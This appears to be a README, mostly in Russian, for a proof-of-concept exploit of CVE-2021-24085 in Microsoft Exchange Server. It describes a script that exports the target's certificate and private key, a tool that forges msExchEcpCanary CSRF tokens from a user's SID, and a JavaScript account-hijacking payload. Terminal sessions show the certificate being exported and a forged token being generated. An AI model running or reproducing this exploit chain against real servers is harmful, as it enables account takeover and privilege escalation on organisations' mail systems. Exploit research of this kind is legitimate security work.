
Эксплойт proof-of-concept для CVE-2021-24085: повышение привилегий на основе CSRF в Microsoft Exchange Server через подделку токена msExchEcpCanary, позволяющее захватить учетную запись.
Это proof-of-concept для CVE-2021-24085.
poc.py загружает файл сертификата цели с закрытым ключом внутриYellowCanary генерирует csrf-токен msExchEcpCanary для конкретного пользователя на основе SIDpoc.js — это csrf-эксплойт для перехвата учетной записиЯ не предоставил файл malicifest.xml, но вы можете найти информацию о том, как создать вредоносный файл манифеста, из доступных ресурсов в разделе ссылок ниже.
Access the certificate with private key inside:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
Now you can generate csrf tokens with YellowCanary using a target users SID:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.